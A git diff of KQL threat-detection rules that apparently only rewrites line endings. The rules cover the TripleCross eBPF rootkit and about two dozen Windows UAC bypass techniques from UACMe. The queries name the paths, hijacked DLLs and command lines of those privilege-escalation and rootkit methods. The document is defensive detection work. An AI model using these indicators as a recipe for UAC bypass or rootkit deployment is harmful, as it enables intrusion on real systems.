+// - Admin changing date of files.
+
+DeviceProcessEvents
 | where ProcessCommandLine contains " -t " and ProcessCommandLine endswith ".service" and FolderPath endswith "/touch"
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/triple_cross_ebpf_rootkit_default_lockfile.kql b/KQL/rules/Defense Evasion/triple_cross_ebpf_rootkit_default_lockfile.kql
index ba212f6e..38fa4642 100644
--- a/KQL/rules/Defense Evasion/triple_cross_ebpf_rootkit_default_lockfile.kql
+++ b/KQL/rules/Defense Evasion/triple_cross_ebpf_rootkit_default_lockfile.kql
@@ -1,12 +1,12 @@
-// Title: Triple Cross eBPF Rootkit Default LockFile
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022-07-05
-// Level: high
-// Description: Detects the creation of the file "rootlog" which is used by the TripleCross rootkit as a way to check if the backdoor is already running.
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion
-// False Positives:
-// - Unlikely
-
-DeviceFileEvents
+// Title: Triple Cross eBPF Rootkit Default LockFile
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-07-05
+// Level: high
+// Description: Detects the creation of the file "rootlog" which is used by the TripleCross rootkit as a way to check if the backdoor is already running.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion
+// False Positives:
+// - Unlikely
+
+DeviceFileEvents
 | where FolderPath =~ "/tmp/rootlog"
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/triple_cross_ebpf_rootkit_execve_hijack.kql b/KQL/rules/Defense Evasion/triple_cross_ebpf_rootkit_execve_hijack.kql
index 5819904a..a95a5a35 100644
--- a/KQL/rules/Defense Evasion/triple_cross_ebpf_rootkit_execve_hijack.kql
+++ b/KQL/rules/Defense Evasion/triple_cross_ebpf_rootkit_execve_hijack.kql
@@ -1,12 +1,12 @@
-// Title: Triple Cross eBPF Rootkit Execve Hijack
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022-07-05
-// Level: high
-// Description: Detects execution of a the file "execve_hijack" which is used by the Triple Cross rootkit as a way to elevate privileges
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.privilege-escalation
-// False Positives:
-// - Unlikely
-
-DeviceProcessEvents
+// Title: Triple Cross eBPF Rootkit Execve Hijack
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-07-05
+// Level: high
+// Description: Detects execution of a the file "execve_hijack" which is used by the Triple Cross rootkit as a way to elevate privileges
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.privilege-escalation
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
 | where ProcessCommandLine contains "execve_hijack" and FolderPath endswith "/sudo"
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/triple_cross_ebpf_rootkit_install_commands.kql b/KQL/rules/Defense Evasion/triple_cross_ebpf_rootkit_install_commands.kql
index 052ac224..bc47c39c 100644
--- a/KQL/rules/Defense Evasion/triple_cross_ebpf_rootkit_install_commands.kql
+++ b/KQL/rules/Defense Evasion/triple_cross_ebpf_rootkit_install_commands.kql
@@ -1,12 +1,12 @@
-// Title: Triple Cross eBPF Rootkit Install Commands
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022-07-05
-// Level: high
-// Description: Detects default install commands of the Triple Cross eBPF rootkit based on the "deployer.sh" script
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1014
-// False Positives:
-// - Unlikely
-
-DeviceProcessEvents
+// Title: Triple Cross eBPF Rootkit Install Commands
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-07-05
+// Level: high
+// Description: Detects default install commands of the Triple Cross eBPF rootkit based on the "deployer.sh" script
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1014
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains " qdisc " or ProcessCommandLine contains " filter ") and (ProcessCommandLine contains " tc " and ProcessCommandLine contains " enp0s3 ") and FolderPath endswith "/sudo"
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/uac_bypass_abusing_winsat_path_parsing_file.kql b/KQL/rules/Defense Evasion/uac_bypass_abusing_winsat_path_parsing_file.kql
index 3a60172f..91f5299e 100644
--- a/KQL/rules/Defense Evasion/uac_bypass_abusing_winsat_path_parsing_file.kql
+++ b/KQL/rules/Defense Evasion/uac_bypass_abusing_winsat_path_parsing_file.kql
@@ -1,10 +1,10 @@
-// Title: UAC Bypass Abusing Winsat Path Parsing - File
-// Author: Christian Burkard (Nextron Systems)
-// Date: 2021-08-30
-// Level: high
-// Description: Detects the pattern of UAC Bypass using a path parsing issue in winsat.exe (UACMe 52)
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1548.002
-
-DeviceFileEvents
+// Title: UAC Bypass Abusing Winsat Path Parsing - File
+// Author: Christian Burkard (Nextron Systems)
+// Date: 2021-08-30
+// Level: high
+// Description: Detects the pattern of UAC Bypass using a path parsing issue in winsat.exe (UACMe 52)
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1548.002
+
+DeviceFileEvents
 | where (FolderPath endswith "\\AppData\\Local\\Temp\\system32\\winsat.exe" or FolderPath endswith "\\AppData\\Local\\Temp\\system32\\winmm.dll") and FolderPath startswith "C:\\Users\\"
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/uac_bypass_abusing_winsat_path_parsing_process.kql b/KQL/rules/Defense Evasion/uac_bypass_abusing_winsat_path_parsing_process.kql
index 237dc504..6830eaf5 100644
--- a/KQL/rules/Defense Evasion/uac_bypass_abusing_winsat_path_parsing_process.kql
+++ b/KQL/rules/Defense Evasion/uac_bypass_abusing_winsat_path_parsing_process.kql
@@ -1,10 +1,10 @@
-// Title: UAC Bypass Abusing Winsat Path Parsing - Process
-// Author: Christian Burkard (Nextron Systems)
-// Date: 2021-08-30
-// Level: high
-// Description: Detects the pattern of UAC Bypass using a path parsing issue in winsat.exe (UACMe 52)
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1548.002
-
-DeviceProcessEvents
+// Title: UAC Bypass Abusing Winsat Path Parsing - Process
+// Author: Christian Burkard (Nextron Systems)
+// Date: 2021-08-30
+// Level: high
+// Description: Detects the pattern of UAC Bypass using a path parsing issue in winsat.exe (UACMe 52)
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1548.002
+
+DeviceProcessEvents
 | where (ProcessIntegrityLevel in~ ("High", "System", "S-1-16-16384", "S-1-16-12288")) and InitiatingProcessCommandLine contains "C:\\Windows \\system32\\winsat.exe" and InitiatingProcessFolderPath endswith "\\AppData\\Local\\Temp\\system32\\winsat.exe"
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/uac_bypass_abusing_winsat_path_parsing_registry.kql b/KQL/rules/Defense Evasion/uac_bypass_abusing_winsat_path_parsing_registry.kql
index c63c2b85..a6fca729 100644
--- a/KQL/rules/Defense Evasion/uac_bypass_abusing_winsat_path_parsing_registry.kql
+++ b/KQL/rules/Defense Evasion/uac_bypass_abusing_winsat_path_parsing_registry.kql
@@ -1,10 +1,10 @@
-// Title: UAC Bypass Abusing Winsat Path Parsing - Registry
-// Author: Christian Burkard (Nextron Systems)
-// Date: 2021-08-30
-// Level: high
-// Description: Detects the pattern of UAC Bypass using a path parsing issue in winsat.exe (UACMe 52)
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1548.002
-
-DeviceRegistryEvents
+// Title: UAC Bypass Abusing Winsat Path Parsing - Registry
+// Author: Christian Burkard (Nextron Systems)
+// Date: 2021-08-30
+// Level: high
+// Description: Detects the pattern of UAC Bypass using a path parsing issue in winsat.exe (UACMe 52)
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1548.002
+
+DeviceRegistryEvents
 | where RegistryValueData endswith "\\appdata\\local\\temp\\system32\\winsat.exe" and RegistryValueData startswith "c:\\users\\" and RegistryKey contains "\\Root\\InventoryApplicationFile\\winsat.exe|" and RegistryKey endswith "\\LowerCaseLongPath"
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/uac_bypass_tools_using_computerdefaults.kql b/KQL/rules/Defense Evasion/uac_bypass_tools_using_computerdefaults.kql
index 1f5f92b5..50fe22f4 100644
--- a/KQL/rules/Defense Evasion/uac_bypass_tools_using_computerdefaults.kql
+++ b/KQL/rules/Defense Evasion/uac_bypass_tools_using_computerdefaults.kql
@@ -1,10 +1,10 @@
-// Title: UAC Bypass Tools Using ComputerDefaults
-// Author: Christian Burkard (Nextron Systems)
-// Date: 2021-08-31
-// Level: high
-// Description: Detects tools such as UACMe used to bypass UAC with computerdefaults.exe (UACMe 59)
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1548.002
-
-DeviceProcessEvents
+// Title: UAC Bypass Tools Using ComputerDefaults
+// Author: Christian Burkard (Nextron Systems)
+// Date: 2021-08-31
+// Level: high
+// Description: Detects tools such as UACMe used to bypass UAC with computerdefaults.exe (UACMe 59)
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1548.002
+
+DeviceProcessEvents
 | where (FolderPath =~ "C:\\Windows\\System32\\ComputerDefaults.exe" and (ProcessIntegrityLevel in~ ("High", "System", "S-1-16-16384", "S-1-16-12288"))) and (not((InitiatingProcessFolderPath contains ":\\Windows\\System32" or InitiatingProcessFolderPath contains ":\\Program Files")))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/uac_bypass_using_changepk_and_slui.kql b/KQL/rules/Defense Evasion/uac_bypass_using_changepk_and_slui.kql
index 35ea1430..ef418a7b 100644
--- a/KQL/rules/Defense Evasion/uac_bypass_using_changepk_and_slui.kql
+++ b/KQL/rules/Defense Evasion/uac_bypass_using_changepk_and_slui.kql
@@ -1,10 +1,10 @@
-// Title: UAC Bypass Using ChangePK and SLUI
-// Author: Christian Burkard (Nextron Systems)
-// Date: 2021-08-23
-// Level: high
-// Description: Detects an UAC bypass that uses changepk.exe and slui.exe (UACMe 61)
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1548.002
-
-DeviceProcessEvents
+// Title: UAC Bypass Using ChangePK and SLUI
+// Author: Christian Burkard (Nextron Systems)
+// Date: 2021-08-23
+// Level: high
+// Description: Detects an UAC bypass that uses changepk.exe and slui.exe (UACMe 61)
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1548.002
+
+DeviceProcessEvents
 | where FolderPath endswith "\\changepk.exe" and (ProcessIntegrityLevel in~ ("High", "System", "S-1-16-16384", "S-1-16-12288")) and InitiatingProcessFolderPath endswith "\\slui.exe"
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/uac_bypass_using_consent_and_comctl32_file.kql b/KQL/rules/Defense Evasion/uac_bypass_using_consent_and_comctl32_file.kql
index 266f342a..b1d43d9e 100644
--- a/KQL/rules/Defense Evasion/uac_bypass_using_consent_and_comctl32_file.kql
+++ b/KQL/rules/Defense Evasion/uac_bypass_using_consent_and_comctl32_file.kql
@@ -1,10 +1,10 @@
-// Title: UAC Bypass Using Consent and Comctl32 - File
-// Author: Christian Burkard (Nextron Systems)
-// Date: 2021-08-23
-// Level: high
-// Description: Detects the pattern of UAC Bypass using consent.exe and comctl32.dll (UACMe 22)
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1548.002
-
-DeviceFileEvents
+// Title: UAC Bypass Using Consent and Comctl32 - File
+// Author: Christian Burkard (Nextron Systems)
+// Date: 2021-08-23
+// Level: high
+// Description: Detects the pattern of UAC Bypass using consent.exe and comctl32.dll (UACMe 22)
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1548.002
+
+DeviceFileEvents
 | where FolderPath endswith "\\comctl32.dll" and FolderPath startswith "C:\\Windows\\System32\\consent.exe.@"
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/uac_bypass_using_consent_and_comctl32_process.kql b/KQL/rules/Defense Evasion/uac_bypass_using_consent_and_comctl32_process.kql
index 39b6db8d..1fd6ae70 100644
--- a/KQL/rules/Defense Evasion/uac_bypass_using_consent_and_comctl32_process.kql
+++ b/KQL/rules/Defense Evasion/uac_bypass_using_consent_and_comctl32_process.kql
@@ -1,10 +1,10 @@
-// Title: UAC Bypass Using Consent and Comctl32 - Process
-// Author: Christian Burkard (Nextron Systems)
-// Date: 2021-08-23
-// Level: high
-// Description: Detects the pattern of UAC Bypass using consent.exe and comctl32.dll (UACMe 22)
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1548.002
-
-DeviceProcessEvents
+// Title: UAC Bypass Using Consent and Comctl32 - Process
+// Author: Christian Burkard (Nextron Systems)
+// Date: 2021-08-23
+// Level: high
+// Description: Detects the pattern of UAC Bypass using consent.exe and comctl32.dll (UACMe 22)
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1548.002
+
+DeviceProcessEvents
 | where FolderPath endswith "\\werfault.exe" and (ProcessIntegrityLevel in~ ("High", "System", "S-1-16-16384", "S-1-16-12288")) and InitiatingProcessFolderPath endswith "\\consent.exe"
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/uac_bypass_using_disk_cleanup.kql b/KQL/rules/Defense Evasion/uac_bypass_using_disk_cleanup.kql
index 8dc93f97..38b2f383 100644
--- a/KQL/rules/Defense Evasion/uac_bypass_using_disk_cleanup.kql
+++ b/KQL/rules/Defense Evasion/uac_bypass_using_disk_cleanup.kql
@@ -1,10 +1,10 @@
-// Title: UAC Bypass Using Disk Cleanup
-// Author: Christian Burkard (Nextron Systems)
-// Date: 2021-08-30
-// Level: high
-// Description: Detects the pattern of UAC Bypass using scheduled tasks and variable expansion of cleanmgr.exe (UACMe 34)
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1548.002
-
-DeviceProcessEvents
+// Title: UAC Bypass Using Disk Cleanup
+// Author: Christian Burkard (Nextron Systems)
+// Date: 2021-08-30
+// Level: high
+// Description: Detects the pattern of UAC Bypass using scheduled tasks and variable expansion of cleanmgr.exe (UACMe 34)
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1548.002
+
+DeviceProcessEvents
 | where ProcessCommandLine endswith "\"\\system32\\cleanmgr.exe /autoclean /d C:" and (ProcessIntegrityLevel in~ ("High", "System", "S-1-16-16384", "S-1-16-12288")) and InitiatingProcessCommandLine =~ "C:\\Windows\\system32\\svchost.exe -k netsvcs -p -s Schedule"
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/uac_bypass_using_dismhost.kql b/KQL/rules/Defense Evasion/uac_bypass_using_dismhost.kql
index e650ff3c..183dc613 100644
--- a/KQL/rules/Defense Evasion/uac_bypass_using_dismhost.kql
+++ b/KQL/rules/Defense Evasion/uac_bypass_using_dismhost.kql
@@ -1,10 +1,10 @@
-// Title: UAC Bypass Using DismHost
-// Author: Christian Burkard (Nextron Systems)
-// Date: 2021-08-30
-// Level: high
-// Description: Detects the pattern of UAC Bypass using DismHost DLL hijacking (UACMe 63)
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1548.002
-
-DeviceProcessEvents
+// Title: UAC Bypass Using DismHost
+// Author: Christian Burkard (Nextron Systems)
+// Date: 2021-08-30
+// Level: high
+// Description: Detects the pattern of UAC Bypass using DismHost DLL hijacking (UACMe 63)
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1548.002
+
+DeviceProcessEvents
 | where (ProcessIntegrityLevel in~ ("High", "System", "S-1-16-16384", "S-1-16-12288")) and (InitiatingProcessFolderPath contains "C:\\Users\\" and InitiatingProcessFolderPath contains "\\AppData\\Local\\Temp\\" and InitiatingProcessFolderPath contains "\\DismHost.exe")
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/uac_bypass_using_event_viewer_recentviews.kql b/KQL/rules/Defense Evasion/uac_bypass_using_event_viewer_recentviews.kql
index de4e7f10..782dcbbd 100644
--- a/KQL/rules/Defense Evasion/uac_bypass_using_event_viewer_recentviews.kql
+++ b/KQL/rules/Defense Evasion/uac_bypass_using_event_viewer_recentviews.kql
@@ -1,10 +1,10 @@
-// Title: UAC Bypass Using Event Viewer RecentViews
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022-11-22
-// Level: high
-// Description: Detects the pattern of UAC Bypass using Event Viewer RecentViews
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.privilege-escalation
-
-DeviceProcessEvents
+// Title: UAC Bypass Using Event Viewer RecentViews
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-11-22
+// Level: high
+// Description: Detects the pattern of UAC Bypass using Event Viewer RecentViews
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.privilege-escalation
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains "\\Event Viewer\\RecentViews" or ProcessCommandLine contains "\\EventV~1\\RecentViews") and ProcessCommandLine contains ">"
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/uac_bypass_using_eventvwr.kql b/KQL/rules/Defense Evasion/uac_bypass_using_eventvwr.kql
index 881fc302..7b2d47c9 100644
--- a/KQL/rules/Defense Evasion/uac_bypass_using_eventvwr.kql
+++ b/KQL/rules/Defense Evasion/uac_bypass_using_eventvwr.kql
@@ -1,10 +1,10 @@
-// Title: UAC Bypass Using EventVwr
-// Author: Antonio Cocomazzi (idea), Florian Roth (Nextron Systems)
-// Date: 2022-04-27
-// Level: high
-// Description: Detects the pattern of a UAC bypass using Windows Event Viewer
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.privilege-escalation
-
-DeviceFileEvents
+// Title: UAC Bypass Using EventVwr
+// Author: Antonio Cocomazzi (idea), Florian Roth (Nextron Systems)
+// Date: 2022-04-27
+// Level: high
+// Description: Detects the pattern of a UAC bypass using Windows Event Viewer
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.privilege-escalation
+
+DeviceFileEvents
 | where (FolderPath endswith "\\Microsoft\\Event Viewer\\RecentViews" or FolderPath endswith "\\Microsoft\\EventV~1\\RecentViews") and (not((InitiatingProcessFolderPath startswith "C:\\Windows\\System32\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\SysWOW64\\")))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/uac_bypass_using_ieinstal_file.kql b/KQL/rules/Defense Evasion/uac_bypass_using_ieinstal_file.kql
index 58e853ed..c451bb97 100644
--- a/KQL/rules/Defense Evasion/uac_bypass_using_ieinstal_file.kql
+++ b/KQL/rules/Defense Evasion/uac_bypass_using_ieinstal_file.kql
@@ -1,10 +1,10 @@
-// Title: UAC Bypass Using IEInstal - File
-// Author: Christian Burkard (Nextron Systems)
-// Date: 2021-08-30
-// Level: high
-// Description: Detects the pattern of UAC Bypass using IEInstal.exe (UACMe 64)
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1548.002
-
-DeviceFileEvents
+// Title: UAC Bypass Using IEInstal - File
+// Author: Christian Burkard (Nextron Systems)
+// Date: 2021-08-30
+// Level: high
+// Description: Detects the pattern of UAC Bypass using IEInstal.exe (UACMe 64)
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1548.002
+
+DeviceFileEvents
 | where InitiatingProcessFolderPath =~ "C:\\Program Files\\Internet Explorer\\IEInstal.exe" and FolderPath contains "\\AppData\\Local\\Temp\\" and FolderPath endswith "consent.exe" and FolderPath startswith "C:\\Users\\"
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/uac_bypass_using_ieinstal_process.kql b/KQL/rules/Defense Evasion/uac_bypass_using_ieinstal_process.kql
index b753c6eb..1f5ee56e 100644
--- a/KQL/rules/Defense Evasion/uac_bypass_using_ieinstal_process.kql
+++ b/KQL/rules/Defense Evasion/uac_bypass_using_ieinstal_process.kql
@@ -1,10 +1,10 @@
-// Title: UAC Bypass Using IEInstal - Process
-// Author: Christian Burkard (Nextron Systems)
-// Date: 2021-08-30
-// Level: high
-// Description: Detects the pattern of UAC Bypass using IEInstal.exe (UACMe 64)
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1548.002
-
-DeviceProcessEvents
+// Title: UAC Bypass Using IEInstal - Process
+// Author: Christian Burkard (Nextron Systems)
+// Date: 2021-08-30
+// Level: high
+// Description: Detects the pattern of UAC Bypass using IEInstal.exe (UACMe 64)
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1548.002
+
+DeviceProcessEvents
 | where FolderPath contains "\\AppData\\Local\\Temp\\" and FolderPath endswith "consent.exe" and (ProcessIntegrityLevel in~ ("High", "System", "S-1-16-16384", "S-1-16-12288")) and InitiatingProcessFolderPath endswith "\\ieinstal.exe"
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/uac_bypass_using_iscsicpl_imageload.kql b/KQL/rules/Defense Evasion/uac_bypass_using_iscsicpl_imageload.kql
index 1f1e1bca..34e30f70 100644
--- a/KQL/rules/Defense Evasion/uac_bypass_using_iscsicpl_imageload.kql
+++ b/KQL/rules/Defense Evasion/uac_bypass_using_iscsicpl_imageload.kql
@@ -1,10 +1,10 @@
-// Title: UAC Bypass Using Iscsicpl - ImageLoad
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022-07-17
-// Level: high
-// Description: Detects the "iscsicpl.exe" UAC bypass technique that leverages a DLL Search Order hijacking technique to load a custom DLL's from temp or a any user controlled location in the users %PATH%
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1548.002
-
-DeviceImageLoadEvents
+// Title: UAC Bypass Using Iscsicpl - ImageLoad
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-07-17
+// Level: high
+// Description: Detects the "iscsicpl.exe" UAC bypass technique that leverages a DLL Search Order hijacking technique to load a custom DLL's from temp or a any user controlled location in the users %PATH%
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1548.002
+
+DeviceImageLoadEvents
 | where (InitiatingProcessFolderPath =~ "C:\\Windows\\SysWOW64\\iscsicpl.exe" and FolderPath endswith "\\iscsiexe.dll") and (not((FolderPath contains "C:\\Windows\\" and FolderPath contains "iscsiexe.dll")))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/uac_bypass_using_msconfig_token_modification_file.kql b/KQL/rules/Defense Evasion/uac_bypass_using_msconfig_token_modification_file.kql
index 5584d8b8..71051fa8 100644
--- a/KQL/rules/Defense Evasion/uac_bypass_using_msconfig_token_modification_file.kql
+++ b/KQL/rules/Defense Evasion/uac_bypass_using_msconfig_token_modification_file.kql
@@ -1,10 +1,10 @@
-// Title: UAC Bypass Using MSConfig Token Modification - File
-// Author: Christian Burkard (Nextron Systems)
-// Date: 2021-08-30
-// Level: high
-// Description: Detects the pattern of UAC Bypass using a msconfig GUI hack (UACMe 55)
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1548.002
-
-DeviceFileEvents
+// Title: UAC Bypass Using MSConfig Token Modification - File
+// Author: Christian Burkard (Nextron Systems)
+// Date: 2021-08-30
+// Level: high
+// Description: Detects the pattern of UAC Bypass using a msconfig GUI hack (UACMe 55)
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1548.002
+
+DeviceFileEvents
 | where FolderPath endswith "\\AppData\\Local\\Temp\\pkgmgr.exe" and FolderPath startswith "C:\\Users\\"
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/uac_bypass_using_msconfig_token_modification_process.kql b/KQL/rules/Defense Evasion/uac_bypass_using_msconfig_token_modification_process.kql
index b775b5fa..7e9d4006 100644
--- a/KQL/rules/Defense Evasion/uac_bypass_using_msconfig_token_modification_process.kql
+++ b/KQL/rules/Defense Evasion/uac_bypass_using_msconfig_token_modification_process.kql
@@ -1,10 +1,10 @@
-// Title: UAC Bypass Using MSConfig Token Modification - Process
-// Author: Christian Burkard (Nextron Systems)
-// Date: 2021-08-30
-// Level: high
-// Description: Detects the pattern of UAC Bypass using a msconfig GUI hack (UACMe 55)
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1548.002
-
-DeviceProcessEvents
+// Title: UAC Bypass Using MSConfig Token Modification - Process
+// Author: Christian Burkard (Nextron Systems)
+// Date: 2021-08-30
+// Level: high
+// Description: Detects the pattern of UAC Bypass using a msconfig GUI hack (UACMe 55)
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1548.002
+
+DeviceProcessEvents
 | where ProcessCommandLine =~ "\"C:\\Windows\\system32\\msconfig.exe\" -5" and (ProcessIntegrityLevel in~ ("High", "System", "S-1-16-16384", "S-1-16-12288")) and InitiatingProcessFolderPath endswith "\\AppData\\Local\\Temp\\pkgmgr.exe"
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/uac_bypass_using_net_code_profiler_on_mmc.kql b/KQL/rules/Defense Evasion/uac_bypass_using_net_code_profiler_on_mmc.kql
index f206c78d..52251d21 100644
--- a/KQL/rules/Defense Evasion/uac_bypass_using_net_code_profiler_on_mmc.kql
+++ b/KQL/rules/Defense Evasion/uac_bypass_using_net_code_profiler_on_mmc.kql
@@ -1,10 +1,10 @@
-// Title: UAC Bypass Using .NET Code Profiler on MMC
-// Author: Christian Burkard (Nextron Systems)
-// Date: 2021-08-30
-// Level: high
-// Description: Detects the pattern of UAC Bypass using .NET Code Profiler and mmc.exe DLL hijacking (UACMe 39)
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1548.002
-
-DeviceFileEvents
+// Title: UAC Bypass Using .NET Code Profiler on MMC
+// Author: Christian Burkard (Nextron Systems)
+// Date: 2021-08-30
+// Level: high
+// Description: Detects the pattern of UAC Bypass using .NET Code Profiler and mmc.exe DLL hijacking (UACMe 39)
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1548.002
+
+DeviceFileEvents
 | where FolderPath endswith "\\AppData\\Local\\Temp\\pe386.dll" and FolderPath startswith "C:\\Users\\"
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/uac_bypass_using_ntfs_reparse_point_file.kql b/KQL/rules/Defense Evasion/uac_bypass_using_ntfs_reparse_point_file.kql
index d728f4ad..e2bef7cb 100644
--- a/KQL/rules/Defense Evasion/uac_bypass_using_ntfs_reparse_point_file.kql
+++ b/KQL/rules/Defense Evasion/uac_bypass_using_ntfs_reparse_point_file.kql
@@ -1,10 +1,10 @@
-// Title: UAC Bypass Using NTFS Reparse Point - File
-// Author: Christian Burkard (Nextron Systems)
-// Date: 2021-08-30
-// Level: high
-// Description: Detects the pattern of UAC Bypass using NTFS reparse point and wusa.exe DLL hijacking (UACMe 36)
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1548.002
-
-DeviceFileEvents
+// Title: UAC Bypass Using NTFS Reparse Point - File
+// Author: Christian Burkard (Nextron Systems)
+// Date: 2021-08-30
+// Level: high
+// Description: Detects the pattern of UAC Bypass using NTFS reparse point and wusa.exe DLL hijacking (UACMe 36)
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1548.002
+
+DeviceFileEvents
 | where FolderPath endswith "\\AppData\\Local\\Temp\\api-ms-win-core-kernel32-legacy-l1.DLL" and FolderPath startswith "C:\\Users\\"
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/uac_bypass_using_ntfs_reparse_point_process.kql b/KQL/rules/Defense Evasion/uac_bypass_using_ntfs_reparse_point_process.kql
index 0b5ad53c..a1dc464d 100644
--- a/KQL/rules/Defense Evasion/uac_bypass_using_ntfs_reparse_point_process.kql
+++ b/KQL/rules/Defense Evasion/uac_bypass_using_ntfs_reparse_point_process.kql
@@ -1,10 +1,10 @@
-// Title: UAC Bypass Using NTFS Reparse Point - Process
-// Author: Christian Burkard (Nextron Systems)
-// Date: 2021-08-30
-// Level: high
-// Description: Detects the pattern of UAC Bypass using NTFS reparse point and wusa.exe DLL hijacking (UACMe 36)
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1548.002
-
-DeviceProcessEvents
+// Title: UAC Bypass Using NTFS Reparse Point - Process
+// Author: Christian Burkard (Nextron Systems)
+// Date: 2021-08-30
+// Level: high
+// Description: Detects the pattern of UAC Bypass using NTFS reparse point and wusa.exe DLL hijacking (UACMe 36)
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1548.002
+
+DeviceProcessEvents
